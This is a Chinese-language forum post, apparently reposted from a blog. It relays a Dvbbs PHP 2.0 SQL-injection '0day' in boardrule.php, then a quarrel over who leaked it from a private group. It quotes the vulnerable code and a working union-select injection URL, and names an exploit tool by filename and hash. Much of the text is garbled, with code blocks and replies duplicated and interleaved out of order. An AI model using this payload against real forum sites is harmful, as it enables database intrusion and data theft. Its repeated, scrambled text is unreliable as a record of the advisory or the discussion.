由Dvbbs PHP 0day引發的爭論
昨天剛剛得到Dvbbs PHP 0day 的資料,看來還是晚了,今天無意間發現了有趣的事情,所以就給大家貼出來。呵呵
漏洞給大家播報下
================================================================
Dvbbs PHP 0day
影響版本:2.0
漏洞檔案:/boardrule.php
Author:sniperhg 小蟑螂
資訊來源:零客網安 [url]www.0kee.com[/url]
——————–分割JJ———————-
相關程式碼:
function brule() {
global $dv,$db,$boardid,$lang,$groupboardid;
$groupboardid=$_GET[`groupboardid`];
if(!empty($_GET[`groupboardid`])){
$rules=$db->scalar(“select rules from {$dv}group_board where id={$groupboardid}”);
================================================================
Dvbbs PHP 0day
影響版本:2.0
漏洞檔案:/boardrule.php
Author:sniperhg 小蟑螂
資訊來源:零客網安 [url]www.0kee.com[/url]
——————–分割JJ———————-
相關程式碼:
function brule() {
global $dv,$db,$boardid,$lang,$groupboardid;
$groupboardid=$_GET[`groupboardid`];
if(!empty($_GET[`groupboardid`])){
$rules=$db->scalar(“select rules from {$dv}group_board where id={$groupboardid}”);
}
else{
$rules=$db->scalar(“select rules from {$dv}board where boardid={$boardid}”);
}
直接獲得變數groupboardid,不為空就直接帶入查詢導致注入。
測試:[url]http://dvbbsroot/boardrule.php?groupboardid=111111111/[/url]**/union/**/select/**/version
else{
$rules=$db->scalar(“select rules from {$dv}board where boardid={$boardid}”);
}
直接獲得變數groupboardid,不為空就直接帶入查詢導致注入。
測試:[url]http://dvbbsroot/boardrule.php?groupboardid=111111111/[/url]**/union/**/select/**/version
()/*
利用工具 dvbbs_php2.0_fucker_.exe MD5 : 6b931f8e00e90cf4b1faa531a59d4b36
利用工具 dvbbs_php2.0_fucker_.exe MD5 : 6b931f8e00e90cf4b1faa531a59d4b36
=========================================================================================
(應該是0DAY的發現者說的,還有可能是零客的老大 下稱作者)題外話:這個0day作為內部資訊我只在10號那天在群共享裡發了。
之前sniperhg本打算在清明節時發出來,沒想到今天下午無意中在鬼仔的blog裡看到了這個。
[url]http://www.huaidan.org/blog/article.asp?id=1767[/url]
文中除了把版權資訊去掉了之外跟我在群裡發的txt幾乎一個字都不帶差的。居然說是揀的。
(應該是0DAY的發現者說的,還有可能是零客的老大 下稱作者)題外話:這個0day作為內部資訊我只在10號那天在群共享裡發了。
之前sniperhg本打算在清明節時發出來,沒想到今天下午無意中在鬼仔的blog裡看到了這個。
[url]http://www.huaidan.org/blog/article.asp?id=1767[/url]
文中除了把版權資訊去掉了之外跟我在群裡發的txt幾乎一個字都不帶差的。居然說是揀的。
東西發就發了,無所謂,也不是多好的東西。
但是就這件事,我非常不爽。
是誰洩露的,我早晚會查個水落石出。
但是就這件事,我非常不爽。
是誰洩露的,我早晚會查個水落石出。
論壇斑竹:
跟帖。。。
我X那個人。
鬼仔也不厚道~
鬼仔:
。。。。。。
不是我不厚道,我是沒想那麼多就發出來了。
不是我不厚道,我是沒想那麼多就發出來了。
不好意思。
作者:
說實話
一定得查查誰洩露的
和鬼仔沒關係
感覺自己內部群裡不應該出現會洩露資訊的人
我一直很相信自己人的
現在也不例外
一定得查查誰洩露的
和鬼仔沒關係
感覺自己內部群裡不應該出現會洩露資訊的人
我一直很相信自己人的
現在也不例外
鬼仔:
關於把版權資訊去掉的問題,是我確實不知道是你們這裡的,我把你們版權資訊加上了。
內部成員:
你還真會撿啊???/
鬼仔:
我已經道歉了,沒必要這樣了吧?
作者:
沒意見
看看蟑螂有何意見和想法
看看蟑螂有何意見和想法
遊客:
不是內部洩露就是馬化騰個J8@!
小蟑螂:
事都過去了。
但是我希望你能告訴是誰給你的。
OK的話就PM給我。不行就當我沒說。
我不希望這個人是我群裡的。
但是我希望你能告訴是誰給你的。
OK的話就PM給我。不行就當我沒說。
我不希望這個人是我群裡的。
呵呵,如果能聯想到一起,那麼就更有趣了,最後總結一句話,什麼事情就怕出內奸,